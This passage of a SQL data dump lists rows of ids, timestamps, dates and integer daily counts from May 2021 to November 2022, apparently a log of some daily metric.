(3826,'2021-05-03 19:28:38','2021-05-03',38),
(3833,'2021-05-04 19:28:21','2021-05-04',81),
(3837,'2021-05-05 19:27:24','2021-05-05',48),
(3839,'2021-05-06 19:28:17','2021-05-06',39),
(3846,'2021-05-07 19:28:23','2021-05-07',78),
(3852,'2021-05-08 19:27:33','2021-05-08',30),
(3868,'2021-05-09 19:27:53','2021-05-09',41),
(3872,'2021-05-10 19:27:25','2021-05-10',48),
(3881,'2021-05-11 19:29:04','2021-05-11',80),
(3887,'2021-05-12 19:28:43','2021-05-12',71),
(3894,'2021-05-13 19:28:09','2021-05-13',41),
(3942,'2021-05-14 19:28:20','2021-05-14',138),
(3949,'2021-05-15 19:27:10','2021-05-15',56),
(3957,'2021-05-16 19:27:49','2021-05-16',33),
(3960,'2021-05-17 19:27:24','2021-05-17',59),
(3963,'2021-05-18 19:28:53','2021-05-18',50),
(3980,'2021-05-19 19:28:25','2021-05-19',45),
(3991,'2021-05-20 20:06:58','2021-05-20',114),
(4000,'2021-05-21 19:28:26','2021-05-21',73),
(4037,'2021-05-22 11:30:23','2021-05-22',22),
(4091,'2021-05-24 19:21:31','2021-05-24',0),
(4092,'2021-05-23 19:27:48','2021-05-23',2),
(4094,'2021-05-28 10:57:58','2021-05-28',14),
(4096,'2021-05-29 10:58:06','2021-05-29',0),
(4106,'2021-06-03 14:34:54','2021-06-03',2),
(4107,'2021-06-04 14:34:55','2021-06-04',0),
(4109,'2021-06-06 13:22:49','2021-06-06',0),
(4110,'2021-06-05 13:22:51','2021-06-05',1),
(4111,'2021-06-14 20:39:46','2021-06-14',6),
(4112,'2021-06-15 20:39:47','2021-06-15',0),
(4118,'2021-06-22 06:11:17','2021-06-22',0),
(4119,'2021-06-21 14:20:47','2021-06-21',4),
(4120,'2021-06-24 19:48:56','2021-06-24',1),
(4121,'2021-06-25 19:49:08','2021-06-25',0),
(4122,'2021-06-26 07:05:59','2021-06-26',66),
(4123,'2021-06-27 19:28:55','2021-06-27',40),
(4189,'2021-06-28 19:28:09','2021-06-28',50),
(4197,'2021-06-29 19:27:54','2021-06-29',66),
(4203,'2021-06-30 19:28:10','2021-06-30',52),
(4214,'2021-07-01 19:28:55','2021-07-01',50),
(4217,'2021-07-02 19:28:24','2021-07-02',39),
(4234,'2021-07-03 19:28:21','2021-07-03',52),
(4239,'2021-07-04 19:27:42','2021-07-04',63),
(4251,'2021-07-05 19:29:02','2021-07-05',125),
(4283,'2021-07-06 19:27:15','2021-07-06',103),
(4295,'2021-07-07 19:27:48','2021-07-07',54),
(4306,'2021-07-08 19:28:46','2021-07-08',57),
(4327,'2021-07-09 19:28:00','2021-07-09',56),
(4339,'2021-07-10 19:28:46','2021-07-10',92),
(4354,'2021-07-11 19:29:07','2021-07-11',39),
(4355,'2021-07-12 19:27:29','2021-07-12',37),
(4358,'2021-07-13 20:05:43','2021-07-13',76),
(4359,'2021-07-14 19:27:29','2021-07-14',86),
(4366,'2021-07-15 19:27:45','2021-07-15',63),
(4372,'2021-07-16 19:31:24','2021-07-16',72),
(4381,'2021-07-17 19:28:27','2021-07-17',46),
(4397,'2021-07-18 19:28:22','2021-07-18',59),
(4407,'2021-07-19 19:28:57','2021-07-19',41),
(4418,'2021-07-20 19:28:29','2021-07-20',43),
(4425,'2021-07-21 19:27:22','2021-07-21',71),
(4426,'2021-07-22 19:29:15','2021-07-22',46),
(4435,'2021-07-23 19:28:01','2021-07-23',52),
(4439,'2021-07-24 19:27:13','2021-07-24',40),
(4446,'2021-07-25 19:29:18','2021-07-25',56),
(4458,'2021-07-26 19:28:39','2021-07-26',37),
(4466,'2021-07-27 19:28:24','2021-07-27',40),
(4469,'2021-07-28 19:27:21','2021-07-28',39),
(4480,'2021-07-29 19:28:03','2021-07-29',46),
(4488,'2021-07-30 19:27:16','2021-07-30',63),
(4499,'2021-07-31 19:27:17','2021-07-31',59),
(4509,'2021-08-01 19:40:51','2021-08-01',57),
(4520,'2021-08-02 19:27:34','2021-08-02',43),
(4528,'2021-08-03 20:02:38','2021-08-03',52),
(4534,'2021-08-04 19:27:37','2021-08-04',41),
(4547,'2021-08-05 19:28:45','2021-08-05',64),
(4554,'2021-08-06 19:28:56','2021-08-06',39),
(4562,'2021-08-07 19:28:16','2021-08-07',26),
(4580,'2021-08-08 19:28:20','2021-08-08',52),
(4585,'2021-08-09 19:27:21','2021-08-09',37),
(4598,'2021-08-10 19:28:26','2021-08-10',40),
(4605,'2021-08-11 19:29:01','2021-08-11',66),
(4615,'2021-08-12 19:28:29','2021-08-12',109),
(4618,'2021-08-13 19:28:44','2021-08-13',79),
(4635,'2021-08-14 19:27:31','2021-08-14',41),
(4641,'2021-08-15 19:28:50','2021-08-15',30),
(4657,'2021-08-16 19:27:35','2021-08-16',35),
(4662,'2021-08-17 19:28:32','2021-08-17',38),
(4668,'2021-08-18 19:27:57','2021-08-18',54),
(4674,'2021-08-19 19:04:27','2021-08-19',66),
(4679,'2021-08-20 19:28:37','2021-08-20',67),
(4696,'2021-08-21 19:27:59','2021-08-21',49),
(4711,'2021-08-22 19:28:53','2021-08-22',43),
(4716,'2021-08-23 19:28:25','2021-08-23',77),
(4720,'2021-08-24 19:28:14','2021-08-24',65),
(4749,'2021-08-25 19:28:58','2021-08-25',71),
(4756,'2021-08-26 19:27:17','2021-08-26',61),
(4761,'2021-08-27 19:27:40','2021-08-27',149),
(4779,'2021-08-28 19:29:03','2021-08-28',46),
(4788,'2021-08-29 19:33:47','2021-08-29',32),
(4790,'2021-08-30 19:27:18','2021-08-30',46),
(4798,'2021-08-31 19:28:16','2021-08-31',48),
(4814,'2021-09-01 19:28:49','2021-09-01',66),
(4824,'2021-09-02 19:27:23','2021-09-02',59),
(4836,'2021-09-03 19:27:41','2021-09-03',93),
(4855,'2021-09-04 19:29:16','2021-09-04',91),
(4864,'2021-09-05 19:29:05','2021-09-05',59),
(4868,'2021-09-06 19:28:20','2021-09-06',46),
(4891,'2021-09-07 19:27:46','2021-09-07',58),
(4902,'2021-09-08 19:27:18','2021-09-08',37),
(4911,'2021-09-09 19:32:26','2021-09-09',68),
(4920,'2021-09-10 19:29:10','2021-09-10',42),
(4946,'2021-09-11 19:28:20','2021-09-11',113),
(4965,'2021-09-12 19:27:34','2021-09-12',47),
(4968,'2021-09-13 19:29:13','2021-09-13',102),
(4971,'2021-09-14 19:28:05','2021-09-14',91),
(5002,'2021-09-15 19:28:57','2021-09-15',105),
(5054,'2021-09-16 19:29:11','2021-09-16',129),
(5107,'2021-09-17 19:27:35','2021-09-17',42),
(5118,'2021-09-18 19:28:59','2021-09-18',70),
(5122,'2021-09-19 19:27:19','2021-09-19',69),
(5129,'2021-09-20 19:27:53','2021-09-20',44),
(5135,'2021-09-21 19:27:10','2021-09-21',66),
(5145,'2021-09-22 19:29:06','2021-09-22',66),
(5166,'2021-09-23 19:27:24','2021-09-23',35),
(5169,'2021-09-24 19:28:07','2021-09-24',75),
(5170,'2021-09-25 19:29:19','2021-09-25',58),
(5183,'2021-09-26 19:29:01','2021-09-26',53),
(5206,'2021-09-27 19:28:40','2021-09-27',44),
(5210,'2021-09-28 19:29:03','2021-09-28',89),
(5216,'2021-09-29 19:29:28','2021-09-29',48),
(5238,'2021-09-30 19:28:55','2021-09-30',54),
(5247,'2021-10-01 19:28:07','2021-10-01',47),
(5257,'2021-10-02 19:28:50','2021-10-02',51),
(5268,'2021-10-03 19:27:49','2021-10-03',72),
(5275,'2021-10-04 19:29:23','2021-10-04',43),
(5279,'2021-10-05 19:28:36','2021-10-05',45),
(5286,'2021-10-06 19:29:39','2021-10-06',161),
(5296,'2021-10-07 19:31:45','2021-10-07',68),
(5386,'2021-10-08 19:28:53','2021-10-08',67),
(5391,'2021-10-09 18:24:01','2021-10-09',62),
(5403,'2021-10-10 19:35:53','2021-10-10',56),
(5406,'2021-10-11 19:27:53','2021-10-11',43),
(5417,'2021-10-12 19:28:34','2021-10-12',56),
(5423,'2021-10-13 19:27:24','2021-10-13',123),
(5433,'2021-10-14 19:28:51','2021-10-14',86),
(5436,'2021-10-15 19:27:38','2021-10-15',50),
(5443,'2021-10-16 19:28:46','2021-10-16',46),
(5451,'2021-10-17 19:29:24','2021-10-17',94),
(5458,'2021-10-18 20:14:08','2021-10-18',149),
(5498,'2021-10-19 19:27:21','2021-10-19',65),
(5525,'2021-10-20 19:27:43','2021-10-20',60),
(5528,'2021-10-21 19:27:22','2021-10-21',66),
(5541,'2021-10-22 19:27:13','2021-10-22',40),
(5557,'2021-10-23 19:28:33','2021-10-23',61),
(5563,'2021-10-24 19:27:17','2021-10-24',36),
(5569,'2021-10-25 21:06:18','2021-10-25',40),
(5578,'2021-10-26 19:27:19','2021-10-26',62),
(5579,'2021-10-27 19:28:25','2021-10-27',62),
(5587,'2021-10-28 19:27:20','2021-10-28',47),
(5602,'2021-10-29 19:27:47','2021-10-29',104),
(5616,'2021-10-30 19:29:00','2021-10-30',42),
(5659,'2021-10-31 19:28:12','2021-10-31',56),
(5667,'2021-11-01 18:28:25','2021-11-01',44),
(5672,'2021-11-02 19:28:01','2021-11-02',35),
(5673,'2021-11-03 19:27:30','2021-11-03',42),
(5678,'2021-11-04 19:27:28','2021-11-04',53),
(5684,'2021-11-05 19:27:33','2021-11-05',184),
(5688,'2021-11-06 19:49:30','2021-11-06',153),
(5724,'2021-11-07 19:28:09','2021-11-07',116),
(5758,'2021-11-08 19:27:39','2021-11-08',54),
(5778,'2021-11-09 19:28:28','2021-11-09',154),
(5785,'2021-11-10 19:28:36','2021-11-10',56),
(5796,'2021-11-11 19:29:04','2021-11-11',55),
(5800,'2021-11-12 19:28:18','2021-11-12',66),
(5810,'2021-11-13 19:28:54','2021-11-13',47),
(5822,'2021-11-14 18:47:14','2021-11-14',56),
(5830,'2021-11-15 19:28:19','2021-11-15',44),
(5852,'2021-11-16 19:28:27','2021-11-16',54),
(5862,'2021-11-17 19:27:38','2021-11-17',71),
(5868,'2021-11-18 19:28:47','2021-11-18',58),
(5888,'2021-11-19 19:28:58','2021-11-19',84),
(5903,'2021-11-20 19:37:18','2021-11-20',154),
(5923,'2021-11-21 19:28:27','2021-11-21',203),
(6001,'2021-11-22 19:28:23','2021-11-22',62),
(6006,'2021-11-23 19:33:37','2021-11-23',158),
(6011,'2021-11-24 19:43:45','2021-11-24',198),
(6088,'2021-11-25 19:37:58','2021-11-25',175),
(6127,'2021-11-26 19:33:45','2021-11-26',164),
(6150,'2021-11-27 19:35:17','2021-11-27',153),
(6185,'2021-11-28 19:34:11','2021-11-28',136),
(6200,'2021-11-29 19:31:05','2021-11-29',117),
(6223,'2021-11-30 19:28:54','2021-11-30',94),
(6242,'2021-12-01 19:27:51','2021-12-01',56),
(6252,'2021-12-02 19:27:48','2021-12-02',69),
(6264,'2021-12-03 19:28:38','2021-12-03',80),
(6281,'2021-12-04 19:35:30','2021-12-04',191),
(6297,'2021-12-05 19:37:42','2021-12-05',220),
(6334,'2021-12-06 19:27:39','2021-12-06',153),
(6374,'2021-12-07 19:29:30','2021-12-07',67),
(6375,'2021-12-08 19:34:21','2021-12-08',167),
(6387,'2021-12-09 19:28:30','2021-12-09',89),
(6418,'2021-12-10 19:27:42','2021-12-10',46),
(6421,'2021-12-11 19:28:52','2021-12-11',32),
(6427,'2021-12-12 19:27:45','2021-12-12',74),
(6438,'2021-12-13 19:28:49','2021-12-13',72),
(6452,'2021-12-14 19:29:16','2021-12-14',68),
(6453,'2021-12-15 19:29:37','2021-12-15',60),
(6472,'2021-12-16 19:27:31','2021-12-16',53),
(6487,'2021-12-17 19:27:12','2021-12-17',35),
(6491,'2021-12-18 19:29:11','2021-12-18',53),
(6499,'2021-12-19 19:28:27','2021-12-19',56),
(6508,'2021-12-20 19:27:27','2021-12-20',36),
(6521,'2021-12-21 19:28:12','2021-12-21',56),
(6524,'2021-12-22 19:27:11','2021-12-22',103),
(6536,'2021-12-23 19:27:27','2021-12-23',106),
(6542,'2021-12-24 19:28:55','2021-12-24',65),
(6553,'2021-12-25 19:28:50','2021-12-25',65),
(6563,'2021-12-26 19:28:11','2021-12-26',32),
(6581,'2021-12-27 19:28:39','2021-12-27',47),
(6586,'2021-12-28 19:27:42','2021-12-28',22),
(6597,'2021-12-29 19:28:36','2021-12-29',42),
(6600,'2021-12-30 19:29:09','2021-12-30',44),
(6603,'2021-12-31 19:28:40','2021-12-31',41),
(6609,'2022-01-01 19:32:08','2022-01-01',39),
(6627,'2022-01-02 19:29:02','2022-01-02',55),
(6635,'2022-01-03 19:29:16','2022-01-03',41),
(6651,'2022-01-04 19:28:10','2022-01-04',29),
(6667,'2022-01-05 19:27:20','2022-01-05',50),
(6675,'2022-01-06 19:27:35','2022-01-06',42),
(6694,'2022-01-07 19:28:36','2022-01-07',43),
(6703,'2022-01-08 19:27:52','2022-01-08',30),
(6707,'2022-01-09 20:05:56','2022-01-09',36),
(6711,'2022-01-10 18:28:21','2022-01-10',33),
(6718,'2022-01-11 19:27:16','2022-01-11',26),
(6728,'2022-01-12 19:28:45','2022-01-12',48),
(6735,'2022-01-13 19:31:56','2022-01-13',58),
(6738,'2022-01-14 19:27:24','2022-01-14',49),
(6743,'2022-01-15 19:29:09','2022-01-15',32),
(6751,'2022-01-16 19:29:56','2022-01-16',30),
(6759,'2022-01-17 19:27:54','2022-01-17',49),
(6764,'2022-01-18 19:28:38','2022-01-18',41),
(6773,'2022-01-19 19:27:33','2022-01-19',47),
(6779,'2022-01-20 19:29:03','2022-01-20',43),
(6791,'2022-01-21 19:27:29','2022-01-21',32),
(6801,'2022-01-22 19:27:43','2022-01-22',36),
(6810,'2022-01-23 19:27:24','2022-01-23',41),
(6815,'2022-01-24 19:27:22','2022-01-24',61),
(6832,'2022-01-25 19:27:43','2022-01-25',37),
(6834,'2022-01-26 19:28:38','2022-01-26',46),
(6840,'2022-01-27 19:27:44','2022-01-27',52),
(6853,'2022-01-28 19:27:11','2022-01-28',54),
(6856,'2022-01-29 19:50:00','2022-01-29',50),
(6868,'2022-01-30 19:28:58','2022-01-30',45),
(6877,'2022-01-31 19:27:19','2022-01-31',40),
(6890,'2022-02-01 19:27:47','2022-02-01',65),
(6901,'2022-02-02 15:44:02','2022-02-02',31),
(6938,'2022-02-03 19:29:16','2022-02-03',53),
(6941,'2022-02-04 19:28:41','2022-02-04',44),
(6945,'2022-02-05 19:27:23','2022-02-05',54),
(6952,'2022-02-06 19:27:47','2022-02-06',63),
(6960,'2022-02-07 19:27:50','2022-02-07',79),
(6970,'2022-02-08 19:27:14','2022-02-08',29),
(6978,'2022-02-09 19:28:35','2022-02-09',40),
(6988,'2022-02-10 19:28:01','2022-02-10',62),
(6995,'2022-02-11 19:28:28','2022-02-11',54),
(7002,'2022-02-12 19:28:57','2022-02-12',55),
(7024,'2022-02-13 19:29:01','2022-02-13',53),
(7036,'2022-02-14 19:28:27','2022-02-14',57),
(7041,'2022-02-15 19:28:39','2022-02-15',70),
(7046,'2022-02-16 19:28:23','2022-02-16',75),
(7077,'2022-02-17 19:28:17','2022-02-17',47),
(7088,'2022-02-18 19:27:40','2022-02-18',93),
(7102,'2022-02-19 19:28:58','2022-02-19',40),
(7109,'2022-02-20 19:27:41','2022-02-20',44),
(7112,'2022-02-21 19:27:41','2022-02-21',34),
(7117,'2022-02-22 19:28:46','2022-02-22',57),
(7119,'2022-02-23 19:28:58','2022-02-23',58),
(7127,'2022-02-24 19:28:47','2022-02-24',38),
(7153,'2022-02-25 19:27:18','2022-02-25',43),
(7160,'2022-02-26 19:27:32','2022-02-26',31),
(7167,'2022-02-27 19:31:42','2022-02-27',22),
(7173,'2022-02-28 19:28:45','2022-02-28',78),
(7178,'2022-03-01 19:27:55','2022-03-01',46),
(7217,'2022-03-02 19:28:28','2022-03-02',36),
(7219,'2022-03-03 17:33:41','2022-03-03',54),
(7225,'2022-03-04 19:29:11','2022-03-04',92),
(7229,'2022-03-05 19:29:13','2022-03-05',41),
(7241,'2022-03-06 19:29:04','2022-03-06',66),
(7248,'2022-03-07 19:28:12','2022-03-07',92),
(7283,'2022-03-08 19:27:25','2022-03-08',61),
(7318,'2022-03-09 19:28:45','2022-03-09',41),
(7327,'2022-03-10 19:27:53','2022-03-10',33),
(7335,'2022-03-11 15:22:57','2022-03-11',38),
(7344,'2022-03-12 19:27:27','2022-03-12',45),
(7360,'2022-03-13 19:29:05','2022-03-13',47),
(7371,'2022-03-14 19:28:54','2022-03-14',65),
(7381,'2022-03-15 19:28:34','2022-03-15',44),
(7398,'2022-03-16 19:28:56','2022-03-16',53),
(7404,'2022-03-17 19:27:10','2022-03-17',115),
(7407,'2022-03-18 19:29:09','2022-03-18',48),
(7418,'2022-03-19 19:29:13','2022-03-19',54),
(7421,'2022-03-20 19:27:30','2022-03-20',54),
(7423,'2022-03-21 19:27:34','2022-03-21',123),
(7433,'2022-03-22 19:12:58','2022-03-22',60),
(7477,'2022-03-23 19:27:54','2022-03-23',45),
(7494,'2022-03-24 18:52:09','2022-03-24',52),
(7500,'2022-03-25 19:27:55','2022-03-25',93),
(7509,'2022-03-26 19:32:00','2022-03-26',33),
(7563,'2022-03-27 19:27:14','2022-03-27',58),
(7576,'2022-03-28 19:28:36','2022-03-28',106),
(7588,'2022-03-29 19:31:54','2022-03-29',59),
(7602,'2022-03-30 18:22:23','2022-03-30',63),
(7618,'2022-03-31 19:01:09','2022-03-31',36),
(7627,'2022-04-01 19:31:08','2022-04-01',56),
(7631,'2022-04-02 19:29:13','2022-04-02',70),
(7650,'2022-04-03 19:27:28','2022-04-03',55),
(7660,'2022-04-04 19:28:18','2022-04-04',65),
(7669,'2022-04-05 19:27:50','2022-04-05',34),
(7680,'2022-04-06 19:28:39','2022-04-06',60),
(7687,'2022-04-07 19:27:45','2022-04-07',74),
(7693,'2022-04-08 19:28:45','2022-04-08',77),
(7705,'2022-04-09 19:27:26','2022-04-09',44),
(7716,'2022-04-10 19:27:55','2022-04-10',35),
(7732,'2022-04-11 19:27:19','2022-04-11',45),
(7736,'2022-04-12 19:30:07','2022-04-12',44),
(7749,'2022-04-13 18:52:15','2022-04-13',72),
(7753,'2022-04-14 19:09:39','2022-04-14',84),
(7776,'2022-04-15 19:29:10','2022-04-15',104),
(7783,'2022-04-16 19:28:32','2022-04-16',76),
(7812,'2022-04-17 19:28:21','2022-04-17',52),
(7820,'2022-04-18 19:28:50','2022-04-18',93),
(7832,'2022-04-19 19:27:59','2022-04-19',61),
(7840,'2022-04-20 19:48:39','2022-04-20',87),
(7850,'2022-04-21 19:28:04','2022-04-21',93),
(7866,'2022-04-22 19:00:19','2022-04-22',75),
(7882,'2022-04-23 19:28:36','2022-04-23',49),
(7893,'2022-04-24 18:54:18','2022-04-24',40),
(7905,'2022-04-25 19:28:45','2022-04-25',67),
(7914,'2022-04-26 19:28:05','2022-04-26',57),
(7944,'2022-04-27 19:16:57','2022-04-27',41),
(7947,'2022-04-28 18:16:13','2022-04-28',72),
(7954,'2022-04-29 19:29:35','2022-04-29',37),
(7975,'2022-04-30 19:17:59','2022-04-30',124),
(7983,'2022-05-01 19:28:18','2022-05-01',49),
(7996,'2022-05-02 19:28:12','2022-05-02',46),
(8016,'2022-05-03 19:29:00','2022-05-03',47),
(8021,'2022-05-04 19:27:49','2022-05-04',74),
(8026,'2022-05-05 19:29:02','2022-05-05',67),
(8031,'2022-05-06 20:19:01','2022-05-06',76),
(8041,'2022-05-07 19:27:07','2022-05-07',67),
(8053,'2022-05-08 19:28:09','2022-05-08',66),
(8074,'2022-05-09 19:27:38','2022-05-09',49),
(8086,'2022-05-10 19:28:45','2022-05-10',49),
(8101,'2022-05-11 19:27:48','2022-05-11',45),
(8106,'2022-05-12 19:27:39','2022-05-12',64),
(8111,'2022-05-13 19:21:17','2022-05-13',58),
(8125,'2022-05-14 19:29:13','2022-05-14',43),
(8141,'2022-05-15 19:27:15','2022-05-15',38),
(8156,'2022-05-16 19:28:16','2022-05-16',55),
(8159,'2022-05-17 19:28:30','2022-05-17',80),
(8178,'2022-05-18 19:27:38','2022-05-18',48),
(8189,'2022-05-19 19:32:21','2022-05-19',89),
(8196,'2022-05-20 19:28:33','2022-05-20',43),
(8225,'2022-05-21 19:28:17','2022-05-21',64),
(8235,'2022-05-22 19:29:02','2022-05-22',64),
(8242,'2022-05-23 19:28:09','2022-05-23',70),
(8251,'2022-05-24 19:27:46','2022-05-24',77),
(8258,'2022-05-25 19:29:30','2022-05-25',51),
(8272,'2022-05-26 19:27:18','2022-05-26',46),
(8288,'2022-05-27 19:28:48','2022-05-27',44),
(8298,'2022-05-28 19:28:17','2022-05-28',68),
(8311,'2022-05-29 19:27:36','2022-05-29',42),
(8325,'2022-05-30 19:29:10','2022-05-30',48),
(8326,'2022-05-31 19:27:26','2022-05-31',47),
(8330,'2022-06-01 19:28:18','2022-06-01',56),
(8336,'2022-06-02 19:28:15','2022-06-02',41),
(8343,'2022-06-03 19:28:47','2022-06-03',68),
(8347,'2022-06-04 19:28:49','2022-06-04',68),
(8358,'2022-06-05 19:28:39','2022-06-05',60),
(8381,'2022-06-06 19:27:37','2022-06-06',75),
(8398,'2022-06-07 19:29:02','2022-06-07',81),
(8420,'2022-06-08 19:27:20','2022-06-08',104),
(8426,'2022-06-09 19:28:29','2022-06-09',51),
(8442,'2022-06-10 19:28:27','2022-06-10',71),
(8451,'2022-06-11 19:28:27','2022-06-11',81),
(8462,'2022-06-12 19:27:29','2022-06-12',125),
(8493,'2022-06-13 19:27:46','2022-06-13',103),
(8514,'2022-06-14 19:28:22','2022-06-14',85),
(8534,'2022-06-15 19:28:26','2022-06-15',84),
(8545,'2022-06-16 19:27:56','2022-06-16',108),
(8554,'2022-06-17 19:28:26','2022-06-17',80),
(8569,'2022-06-18 19:27:39','2022-06-18',59),
(8571,'2022-06-19 19:28:17','2022-06-19',48),
(8580,'2022-06-20 19:28:51','2022-06-20',47),
(8603,'2022-06-21 19:30:16','2022-06-21',105),
(8606,'2022-06-22 19:29:04','2022-06-22',89),
(8651,'2022-06-23 19:28:35','2022-06-23',76),
(8660,'2022-06-24 19:27:41','2022-06-24',73),
(8683,'2022-06-25 19:32:46','2022-06-25',65),
(8691,'2022-06-26 19:27:16','2022-06-26',63),
(8714,'2022-06-27 19:27:41','2022-06-27',39),
(8725,'2022-06-28 19:29:30','2022-06-28',60),
(8732,'2022-06-29 19:28:10','2022-06-29',63),
(8751,'2022-06-30 19:27:49','2022-06-30',56),
(8758,'2022-07-01 19:27:19','2022-07-01',66),
(8769,'2022-07-02 19:27:29','2022-07-02',67),
(8777,'2022-07-03 19:27:35','2022-07-03',38),
(8788,'2022-07-04 19:28:15','2022-07-04',43),
(8800,'2022-07-05 19:29:18','2022-07-05',50),
(8809,'2022-07-06 19:27:23','2022-07-06',49),
(8822,'2022-07-07 19:29:33','2022-07-07',104),
(8833,'2022-07-08 19:28:37','2022-07-08',68),
(8856,'2022-07-09 19:27:50','2022-07-09',80),
(8869,'2022-07-10 19:28:14','2022-07-10',70),
(8876,'2022-07-11 19:27:26','2022-07-11',66),
(8898,'2022-07-12 19:27:31','2022-07-12',91),
(8911,'2022-07-13 19:27:35','2022-07-13',82),
(8936,'2022-07-14 19:32:33','2022-07-14',81),
(8946,'2022-07-15 19:27:32','2022-07-15',87),
(8963,'2022-07-16 19:29:00','2022-07-16',73),
(8970,'2022-07-17 19:29:49','2022-07-17',75),
(8986,'2022-07-18 19:27:20','2022-07-18',52),
(8993,'2022-07-19 19:28:14','2022-07-19',65),
(8998,'2022-07-20 19:29:01','2022-07-20',54),
(9008,'2022-07-21 19:27:41','2022-07-21',52),
(9016,'2022-07-22 19:28:28','2022-07-22',50),
(9036,'2022-07-23 19:29:38','2022-07-23',52),
(9046,'2022-07-24 19:28:56','2022-07-24',45),
(9051,'2022-07-25 19:29:23','2022-07-25',57),
(9061,'2022-07-26 19:27:31','2022-07-26',30),
(9068,'2022-07-27 19:28:40','2022-07-27',46),
(9076,'2022-07-28 19:28:48','2022-07-28',54),
(9082,'2022-07-29 19:28:50','2022-07-29',37),
(9101,'2022-07-30 19:27:58','2022-07-30',49),
(9106,'2022-07-31 19:28:39','2022-07-31',59),
(9110,'2022-08-01 19:29:22','2022-08-01',47),
(9120,'2022-08-02 19:27:56','2022-08-02',57),
(9127,'2022-08-03 19:28:39','2022-08-03',48),
(9141,'2022-08-04 19:27:55','2022-08-04',46),
(9150,'2022-08-05 19:28:41','2022-08-05',50),
(9160,'2022-08-06 19:28:37','2022-08-06',68),
(9168,'2022-08-07 19:28:47','2022-08-07',58),
(9177,'2022-08-08 19:28:23','2022-08-08',58),
(9181,'2022-08-09 19:27:24','2022-08-09',84),
(9195,'2022-08-10 19:28:28','2022-08-10',99),
(9207,'2022-08-11 19:29:07','2022-08-11',98),
(9250,'2022-08-12 19:27:55','2022-08-12',93),
(9276,'2022-08-13 19:28:13','2022-08-13',110),
(9287,'2022-08-14 19:28:19','2022-08-14',79),
(9303,'2022-08-15 19:28:52','2022-08-15',60),
(9320,'2022-08-16 19:28:29','2022-08-16',71),
(9335,'2022-08-17 19:27:26','2022-08-17',59),
(9350,'2022-08-18 19:28:47','2022-08-18',67),
(9361,'2022-08-19 19:27:29','2022-08-19',76),
(9375,'2022-08-20 19:28:37','2022-08-20',52),
(9401,'2022-08-21 19:29:06','2022-08-21',62),
(9409,'2022-08-22 19:27:49','2022-08-22',63),
(9415,'2022-08-23 19:29:07','2022-08-23',64),
(9428,'2022-08-24 19:27:31','2022-08-24',87),
(9442,'2022-08-25 19:27:26','2022-08-25',65),
(9455,'2022-08-26 19:28:48','2022-08-26',51),
(9468,'2022-08-27 19:27:29','2022-08-27',114),
(9482,'2022-08-28 19:27:45','2022-08-28',141),
(9506,'2022-08-29 19:27:45','2022-08-29',65),
(9539,'2022-08-30 19:27:37','2022-08-30',79),
(9557,'2022-08-31 19:28:11','2022-08-31',37),
(9578,'2022-09-01 19:29:19','2022-09-01',36),
(9582,'2022-09-02 19:28:31','2022-09-02',81),
(9587,'2022-09-03 19:28:51','2022-09-03',56),
(9602,'2022-09-04 19:27:51','2022-09-04',44),
(9604,'2022-09-05 19:29:03','2022-09-05',46),
(9606,'2022-09-06 19:29:12','2022-09-06',70),
(9612,'2022-09-07 19:28:31','2022-09-07',80),
(9620,'2022-09-08 19:28:45','2022-09-08',60),
(9647,'2022-09-09 19:28:30','2022-09-09',77),
(9666,'2022-09-10 19:28:24','2022-09-10',68),
(9670,'2022-09-11 19:29:14','2022-09-11',66),
(9675,'2022-09-12 19:27:22','2022-09-12',77),
(9691,'2022-09-13 19:27:37','2022-09-13',72),
(9702,'2022-09-14 19:30:07','2022-09-14',77),
(9716,'2022-09-15 19:27:33','2022-09-15',56),
(9734,'2022-09-16 19:28:59','2022-09-16',67),
(9744,'2022-09-17 19:27:42','2022-09-17',49),
(9753,'2022-09-18 19:29:15','2022-09-18',20),
(9762,'2022-09-19 19:27:19','2022-09-19',53),
(9765,'2022-09-20 19:27:51','2022-09-20',60),
(9782,'2022-09-21 19:27:51','2022-09-21',44),
(9794,'2022-09-22 19:28:40','2022-09-22',83),
(9800,'2022-09-23 19:27:50','2022-09-23',47),
(9813,'2022-09-24 19:28:13','2022-09-24',120),
(9816,'2022-09-25 19:27:45','2022-09-25',78),
(9840,'2022-09-26 19:43:40','2022-09-26',85),
(9848,'2022-09-27 19:28:50','2022-09-27',74),
(9859,'2022-09-28 19:29:59','2022-09-28',113),
(9872,'2022-09-29 19:28:40','2022-09-29',62),
(9885,'2022-09-30 19:27:24','2022-09-30',35),
(9898,'2022-10-01 19:27:54','2022-10-01',112),
(9903,'2022-10-02 19:29:14','2022-10-02',47),
(9911,'2022-10-03 19:28:27','2022-10-03',36),
(9922,'2022-10-04 19:28:45','2022-10-04',36),
(9926,'2022-10-05 19:29:49','2022-10-05',60),
(9938,'2022-10-06 19:28:42','2022-10-06',105),
(9943,'2022-10-07 19:29:05','2022-10-07',76),
(9955,'2022-10-08 19:28:47','2022-10-08',66),
(9965,'2022-10-09 07:34:20','2022-10-09',21),
(9983,'2022-10-10 23:34:30','2022-10-10',20),
(9984,'2022-10-11 23:06:48','2022-10-11',40),
(9985,'2022-10-12 21:40:08','2022-10-12',49),
(9986,'2022-10-13 22:54:48','2022-10-13',62),
(9987,'2022-10-14 23:06:03','2022-10-14',64),
(9988,'2022-10-15 23:07:47','2022-10-15',74),
(9989,'2022-10-16 23:50:48','2022-10-16',54),
(9990,'2022-10-17 22:23:13','2022-10-17',72),
(9991,'2022-10-18 22:53:00','2022-10-18',58),
(9992,'2022-10-19 23:18:29','2022-10-19',131),
(9993,'2022-10-20 23:52:42','2022-10-20',62),
(9994,'2022-10-21 23:55:26','2022-10-21',62),
(9995,'2022-10-22 18:29:19','2022-10-22',83),
(9996,'2022-10-31 23:43:03','2022-10-31',39),
(9997,'2022-11-01 23:28:36','2022-11-01',78),
(9998,'2022-11-02 23:50:27','2022-11-02',48),
(9999,'2022-11-03 23:59:11','2022-11-03',45),
(10000,'2022-11-04 22:10:28','2022-11-04',47),
(10001,'2022-11-05 23:33:46','2022-11-05',55),
(10002,'2022-11-06 23:38:19','2022-11-06',82),
(10003,'2022-11-07 23:31:09','2022-11-07',68),
(10004,'2022-11-08 23:50:10','2022-11-08',207),
(10005,'2022-11-09 23:45:04','2022-11-09',63),
(10006,'2022-11-10 22:51:29','2022-11-10',94),
(10007,'2022-11-11 23:39:18','2022-11-11',54),
(10008,'2022-11-12 22:39:35','2022-11-12',82),
(10009,'2022-11-13 23:54:38','2022-11-13',53),
(10010,'2022-11-14 23:58:45','2022-11-14',106),
(10011,'2022-11-15 23:39:39','2022-11-15',74),
(10012,'2022-11-16 23:51:12','2022-11-16',39),
